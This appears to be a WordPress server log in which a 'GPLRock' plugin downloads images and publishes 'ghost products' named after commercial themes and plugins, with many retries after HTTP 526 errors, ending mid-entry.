/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-292116a3.jpg [05-Apr-2026 19:57:32 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-listing-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-292116a3.jpg [05-Apr-2026 19:57:32 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-listing-payments [05-Apr-2026 19:57:34 UTC] GPLRock: Image downloaded successfully for product woocommerce-multipurpose-responsive-wordpress-theme-wizestore (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a37d1340.jpg [05-Apr-2026 19:57:34 UTC] GPLRock: Using pre-downloaded image for product woocommerce-multipurpose-responsive-wordpress-theme-wizestore: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a37d1340.jpg [05-Apr-2026 19:57:34 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-multipurpose-responsive-wordpress-theme-wizestore [05-Apr-2026 19:57:35 UTC] GPLRock: Image downloaded successfully for product ninja-kick-sliding-panel-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-813db6ed.jpg [05-Apr-2026 19:57:35 UTC] GPLRock: Using pre-downloaded image for product ninja-kick-sliding-panel-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-813db6ed.jpg [05-Apr-2026 19:57:35 UTC] GPLRock: Ghost product published with image - Product ID: ninja-kick-sliding-panel-for-wordpress [05-Apr-2026 19:57:37 UTC] GPLRock: Image downloaded successfully for product wpruby-woocommerce-restricted-shipping-and-payment-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-126d0eed.jpg [05-Apr-2026 19:57:37 UTC] GPLRock: Using pre-downloaded image for product wpruby-woocommerce-restricted-shipping-and-payment-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-126d0eed.jpg [05-Apr-2026 19:57:37 UTC] GPLRock: Ghost product published with image - Product ID: wpruby-woocommerce-restricted-shipping-and-payment-pro [05-Apr-2026 20:08:22 UTC] GPLRock: Image download failed for product selection-elementor-addons-pack-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:24 UTC] GPLRock: Image download failed for product selection-elementor-addons-pack-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/selection--elementor-addons-pack-for-wordpress-27114.webp for product selection-elementor-addons-pack-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:27 UTC] GPLRock: Image download failed for product selection-elementor-addons-pack-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:29 UTC] GPLRock: Image download failed for product selection-elementor-addons-pack-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/selection--elementor-addons-pack-for-wordpress-27114.webp for product selection-elementor-addons-pack-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:31 UTC] GPLRock WARNING: Image download failed for product selection-elementor-addons-pack-for-wordpress. URL: https://meldwp.com/wp-content/uploads/selection--elementor-addons-pack-for-wordpress-27114.webp [05-Apr-2026 20:08:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: selection-elementor-addons-pack-for-wordpress [05-Apr-2026 20:08:31 UTC] GPLRock: Image download failed for product cf-7-connector-mailchimp-mailerlite-and-zapier (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:33 UTC] GPLRock: Image download failed for product cf-7-connector-mailchimp-mailerlite-and-zapier (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cf-7-connector-mailchimp-mailerlite-and-zapier-968.webp for product cf-7-connector-mailchimp-mailerlite-and-zapier after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:35 UTC] GPLRock: Image download failed for product cf-7-connector-mailchimp-mailerlite-and-zapier (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:37 UTC] GPLRock: Image download failed for product cf-7-connector-mailchimp-mailerlite-and-zapier (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cf-7-connector-mailchimp-mailerlite-and-zapier-968.webp for product cf-7-connector-mailchimp-mailerlite-and-zapier after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:39 UTC] GPLRock WARNING: Image download failed for product cf-7-connector-mailchimp-mailerlite-and-zapier. URL: https://meldwp.com/wp-content/uploads/cf-7-connector-mailchimp-mailerlite-and-zapier-968.webp [05-Apr-2026 20:08:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cf-7-connector-mailchimp-mailerlite-and-zapier [05-Apr-2026 20:08:40 UTC] GPLRock: Image download failed for product nmon-website-service-server-monitoring (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:42 UTC] GPLRock: Image download failed for product nmon-website-service-server-monitoring (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nmon---website-service--server-monitoring-4936.webp for product nmon-website-service-server-monitoring after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:44 UTC] GPLRock: Image download failed for product nmon-website-service-server-monitoring (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:46 UTC] GPLRock: Image download failed for product nmon-website-service-server-monitoring (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nmon---website-service--server-monitoring-4936.webp for product nmon-website-service-server-monitoring after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:48 UTC] GPLRock WARNING: Image download failed for product nmon-website-service-server-monitoring. URL: https://meldwp.com/wp-content/uploads/nmon---website-service--server-monitoring-4936.webp [05-Apr-2026 20:08:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nmon-website-service-server-monitoring [05-Apr-2026 20:08:48 UTC] GPLRock: Image download failed for product booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:50 UTC] GPLRock: Image download failed for product booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/booknetic---appointment-booking--appointment-scheduling--calendar-reservation-sa-4378.webp for product booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:53 UTC] GPLRock: Image download failed for product booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:55 UTC] GPLRock: Image download failed for product booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/booknetic---appointment-booking--appointment-scheduling--calendar-reservation-sa-4378.webp for product booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:08:57 UTC] GPLRock WARNING: Image download failed for product booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas. URL: https://meldwp.com/wp-content/uploads/booknetic---appointment-booking--appointment-scheduling--calendar-reservation-sa-4378.webp [05-Apr-2026 20:08:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: booknetic-appointment-booking-appointment-scheduling-calendar-reservation-saas [05-Apr-2026 20:08:57 UTC] GPLRock: Image download failed for product ajax-tabs-woocommerce-categories-tab-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:08:59 UTC] GPLRock: Image download failed for product ajax-tabs-woocommerce-categories-tab-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajax-tabs---woocommerce-categories-tab-wordpress-plugin-25249.webp for product ajax-tabs-woocommerce-categories-tab-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:01 UTC] GPLRock: Image download failed for product ajax-tabs-woocommerce-categories-tab-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:03 UTC] GPLRock: Image download failed for product ajax-tabs-woocommerce-categories-tab-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajax-tabs---woocommerce-categories-tab-wordpress-plugin-25249.webp for product ajax-tabs-woocommerce-categories-tab-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:06 UTC] GPLRock WARNING: Image download failed for product ajax-tabs-woocommerce-categories-tab-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/ajax-tabs---woocommerce-categories-tab-wordpress-plugin-25249.webp [05-Apr-2026 20:09:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ajax-tabs-woocommerce-categories-tab-wordpress-plugin [05-Apr-2026 20:09:06 UTC] GPLRock: Image download failed for product wp-ultimo-email-verification-step (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:08 UTC] GPLRock: Image download failed for product wp-ultimo-email-verification-step (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-ultimo-email-verification-step-26140.webp for product wp-ultimo-email-verification-step after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:10 UTC] GPLRock: Image download failed for product wp-ultimo-email-verification-step (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:12 UTC] GPLRock: Image download failed for product wp-ultimo-email-verification-step (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-ultimo-email-verification-step-26140.webp for product wp-ultimo-email-verification-step after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:14 UTC] GPLRock WARNING: Image download failed for product wp-ultimo-email-verification-step. URL: https://meldwp.com/wp-content/uploads/wp-ultimo-email-verification-step-26140.webp [05-Apr-2026 20:09:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-ultimo-email-verification-step [05-Apr-2026 20:09:14 UTC] GPLRock: Image downloaded successfully for product woocommerce-multiple-currencies (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73bee459.webp [05-Apr-2026 20:09:14 UTC] GPLRock: Using pre-downloaded image for product woocommerce-multiple-currencies: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73bee459.webp [05-Apr-2026 20:09:14 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-multiple-currencies [05-Apr-2026 20:09:15 UTC] GPLRock: Image download failed for product voicer-text-to-speech-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:17 UTC] GPLRock: Image download failed for product voicer-text-to-speech-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voicer--text-to-speech-plugin-for-wordpress-32749.webp for product voicer-text-to-speech-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:19 UTC] GPLRock: Image download failed for product voicer-text-to-speech-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:21 UTC] GPLRock: Image download failed for product voicer-text-to-speech-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voicer--text-to-speech-plugin-for-wordpress-32749.webp for product voicer-text-to-speech-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:23 UTC] GPLRock WARNING: Image download failed for product voicer-text-to-speech-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/voicer--text-to-speech-plugin-for-wordpress-32749.webp [05-Apr-2026 20:09:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: voicer-text-to-speech-plugin-for-wordpress [05-Apr-2026 20:09:23 UTC] GPLRock: Image download failed for product eurosafe-gpsr-directive-compatibility-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:25 UTC] GPLRock: Image download failed for product eurosafe-gpsr-directive-compatibility-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eurosafe---gpsr-directive-compatibility-for-woocommerce-2256.webp for product eurosafe-gpsr-directive-compatibility-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:28 UTC] GPLRock: Image download failed for product eurosafe-gpsr-directive-compatibility-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:30 UTC] GPLRock: Image download failed for product eurosafe-gpsr-directive-compatibility-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:09:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eurosafe---gpsr-directive-compatibility-for-woocommerce-2256.webp for product eurosafe-gpsr-directive-compatibility-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:09:32 UTC] GPLRock WARNING: Image download failed for product eurosafe-gpsr-directive-compatibility-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/eurosafe---gpsr-directive-compatibility-for-woocommerce-2256.webp [05-Apr-2026 20:09:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eurosafe-gpsr-directive-compatibility-for-woocommerce [05-Apr-2026 20:09:32 UTC] GPLRock: Image downloaded successfully for product events-shortcodes-block-pro-for-the-events-calendar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-109ee0c0.webp [05-Apr-2026 20:09:32 UTC] GPLRock: Using pre-downloaded image for product events-shortcodes-block-pro-for-the-events-calendar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-109ee0c0.webp [05-Apr-2026 20:09:32 UTC] GPLRock: Ghost product published with image - Product ID: events-shortcodes-block-pro-for-the-events-calendar [05-Apr-2026 20:11:09 UTC] GPLRock: Image downloaded successfully for product noor-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1058f9f.jpg [05-Apr-2026 20:11:09 UTC] GPLRock: Using pre-downloaded image for product noor-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1058f9f.jpg [05-Apr-2026 20:11:09 UTC] GPLRock: Ghost product published with image - Product ID: noor-multi-purpose-theme [05-Apr-2026 20:11:11 UTC] GPLRock: Image downloaded successfully for product junko-technology-theme-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09200207.jpg [05-Apr-2026 20:11:11 UTC] GPLRock: Using pre-downloaded image for product junko-technology-theme-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09200207.jpg [05-Apr-2026 20:11:11 UTC] GPLRock: Ghost product published with image - Product ID: junko-technology-theme-for-woocommerce-wordpress [05-Apr-2026 20:11:13 UTC] GPLRock: Image downloaded successfully for product blacksilver-photography-theme-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-33e85ec8.jpg [05-Apr-2026 20:11:13 UTC] GPLRock: Using pre-downloaded image for product blacksilver-photography-theme-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-33e85ec8.jpg [05-Apr-2026 20:11:13 UTC] GPLRock: Ghost product published with image - Product ID: blacksilver-photography-theme-for-wordpress [05-Apr-2026 20:11:14 UTC] GPLRock: Image downloaded successfully for product cool-timeline-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e3afac9.jpg [05-Apr-2026 20:11:14 UTC] GPLRock: Using pre-downloaded image for product cool-timeline-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e3afac9.jpg [05-Apr-2026 20:11:14 UTC] GPLRock: Ghost product published with image - Product ID: cool-timeline-pro [05-Apr-2026 20:11:15 UTC] GPLRock: Image downloaded successfully for product woocommerce-bambora-beanstream (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5ebd7d7.jpg [05-Apr-2026 20:11:15 UTC] GPLRock: Using pre-downloaded image for product woocommerce-bambora-beanstream: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5ebd7d7.jpg [05-Apr-2026 20:11:15 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-bambora-beanstream [05-Apr-2026 20:11:17 UTC] GPLRock: Image downloaded successfully for product woocommerce-catalog-visibility-options (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e647c60d.jpg [05-Apr-2026 20:11:17 UTC] GPLRock: Using pre-downloaded image for product woocommerce-catalog-visibility-options: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e647c60d.jpg [05-Apr-2026 20:11:17 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-catalog-visibility-options [05-Apr-2026 20:11:18 UTC] GPLRock: Image downloaded successfully for product woocommerce-elavon-converge-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ce3c716.jpg [05-Apr-2026 20:11:18 UTC] GPLRock: Using pre-downloaded image for product woocommerce-elavon-converge-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ce3c716.jpg [05-Apr-2026 20:11:18 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-elavon-converge-payment-gateway [05-Apr-2026 20:11:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-kissmetrics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d00cc0e1.jpg [05-Apr-2026 20:11:19 UTC] GPLRock: Using pre-downloaded image for product woocommerce-kissmetrics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d00cc0e1.jpg [05-Apr-2026 20:11:19 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-kissmetrics [05-Apr-2026 20:11:20 UTC] GPLRock: Image downloaded successfully for product woocommerce-mixpanel (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4d508a7.jpg [05-Apr-2026 20:11:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-mixpanel: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4d508a7.jpg [05-Apr-2026 20:11:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-mixpanel [05-Apr-2026 20:11:22 UTC] GPLRock: Image downloaded successfully for product woocommerce-moneris-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-415ebc77.jpg [05-Apr-2026 20:11:22 UTC] GPLRock: Using pre-downloaded image for product woocommerce-moneris-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-415ebc77.jpg [05-Apr-2026 20:11:22 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-moneris-gateway [05-Apr-2026 20:13:00 UTC] GPLRock: Image downloaded successfully for product taqyeem-wordpress-review-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca7bfb26.jpg [05-Apr-2026 20:13:00 UTC] GPLRock: Using pre-downloaded image for product taqyeem-wordpress-review-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca7bfb26.jpg [05-Apr-2026 20:13:00 UTC] GPLRock: Ghost product published with image - Product ID: taqyeem-wordpress-review-plugin [05-Apr-2026 20:13:02 UTC] GPLRock: Image downloaded successfully for product learndash-lms-propanel-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31304256.jpg [05-Apr-2026 20:13:02 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-propanel-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31304256.jpg [05-Apr-2026 20:13:02 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-propanel-addon [05-Apr-2026 20:13:04 UTC] GPLRock: Image downloaded successfully for product 907-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62ee14de.jpg [05-Apr-2026 20:13:04 UTC] GPLRock: Using pre-downloaded image for product 907-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62ee14de.jpg [05-Apr-2026 20:13:04 UTC] GPLRock: Ghost product published with image - Product ID: 907-responsive-multi-purpose-wordpress-theme [05-Apr-2026 20:13:06 UTC] GPLRock: Image downloaded successfully for product renovation-construction-company-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62bd4db8.jpg [05-Apr-2026 20:13:06 UTC] GPLRock: Using pre-downloaded image for product renovation-construction-company-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62bd4db8.jpg [05-Apr-2026 20:13:06 UTC] GPLRock: Ghost product published with image - Product ID: renovation-construction-company-theme [05-Apr-2026 20:13:07 UTC] GPLRock: Image downloaded successfully for product download-monitor-buttons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f08fbc17.jpg [05-Apr-2026 20:13:07 UTC] GPLRock: Using pre-downloaded image for product download-monitor-buttons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f08fbc17.jpg [05-Apr-2026 20:13:07 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-buttons [05-Apr-2026 20:13:09 UTC] GPLRock: Image downloaded successfully for product download-monitor-mailchimp-lock (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-66e8854b.jpg [05-Apr-2026 20:13:09 UTC] GPLRock: Using pre-downloaded image for product download-monitor-mailchimp-lock: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-66e8854b.jpg [05-Apr-2026 20:13:09 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-mailchimp-lock [05-Apr-2026 20:13:10 UTC] GPLRock: Image downloaded successfully for product download-monitor-email-lock (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3eccf200.jpg [05-Apr-2026 20:13:10 UTC] GPLRock: Using pre-downloaded image for product download-monitor-email-lock: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3eccf200.jpg [05-Apr-2026 20:13:10 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-email-lock [05-Apr-2026 20:13:12 UTC] GPLRock: Image downloaded successfully for product download-monitor-terms-conditions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fdccb385.jpg [05-Apr-2026 20:13:12 UTC] GPLRock: Using pre-downloaded image for product download-monitor-terms-conditions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fdccb385.jpg [05-Apr-2026 20:13:12 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-terms-conditions [05-Apr-2026 20:23:24 UTC] GPLRock: Image downloaded successfully for product woolementor-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-618377ce.jpg [05-Apr-2026 20:23:24 UTC] GPLRock: Using pre-downloaded image for product woolementor-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-618377ce.jpg [05-Apr-2026 20:23:24 UTC] GPLRock: Ghost product published with image - Product ID: woolementor-pro [05-Apr-2026 20:23:26 UTC] GPLRock: Image downloaded successfully for product oshine-multipurpose-creative-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a68dbdb.jpg [05-Apr-2026 20:23:26 UTC] GPLRock: Using pre-downloaded image for product oshine-multipurpose-creative-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a68dbdb.jpg [05-Apr-2026 20:23:26 UTC] GPLRock: Ghost product published with image - Product ID: oshine-multipurpose-creative-theme [05-Apr-2026 20:23:27 UTC] GPLRock: Image downloaded successfully for product mythemeshop-magnus-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-159b171f.jpg [05-Apr-2026 20:23:28 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-magnus-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-159b171f.jpg [05-Apr-2026 20:23:28 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-magnus-wordpress-theme [05-Apr-2026 20:23:29 UTC] GPLRock: Image downloaded successfully for product out-of-the-box-dropbox-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4986177b.jpg [05-Apr-2026 20:23:29 UTC] GPLRock: Using pre-downloaded image for product out-of-the-box-dropbox-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4986177b.jpg [05-Apr-2026 20:23:29 UTC] GPLRock: Ghost product published with image - Product ID: out-of-the-box-dropbox-plugin-for-wordpress [05-Apr-2026 20:23:31 UTC] GPLRock: Image downloaded successfully for product share-one-drive-onedrive-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b947030a.jpg [05-Apr-2026 20:23:31 UTC] GPLRock: Using pre-downloaded image for product share-one-drive-onedrive-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b947030a.jpg [05-Apr-2026 20:23:31 UTC] GPLRock: Ghost product published with image - Product ID: share-one-drive-onedrive-plugin-for-wordpress [05-Apr-2026 20:23:33 UTC] GPLRock: Image downloaded successfully for product woocommerce-dynamic-pricing-discounts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b915c8b.jpg [05-Apr-2026 20:23:33 UTC] GPLRock: Using pre-downloaded image for product woocommerce-dynamic-pricing-discounts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b915c8b.jpg [05-Apr-2026 20:23:33 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-dynamic-pricing-discounts [05-Apr-2026 20:23:34 UTC] GPLRock: Image downloaded successfully for product advanced-custom-fields-multilingual (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9193add6.jpg [05-Apr-2026 20:23:34 UTC] GPLRock: Using pre-downloaded image for product advanced-custom-fields-multilingual: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9193add6.jpg [05-Apr-2026 20:23:34 UTC] GPLRock: Ghost product published with image - Product ID: advanced-custom-fields-multilingual [05-Apr-2026 20:23:35 UTC] GPLRock: Image downloaded successfully for product woocommerce-lead-time (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-834353d9.jpg [05-Apr-2026 20:23:35 UTC] GPLRock: Using pre-downloaded image for product woocommerce-lead-time: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-834353d9.jpg [05-Apr-2026 20:23:35 UTC] GPLRock: Ghost product published with image - Product ID: 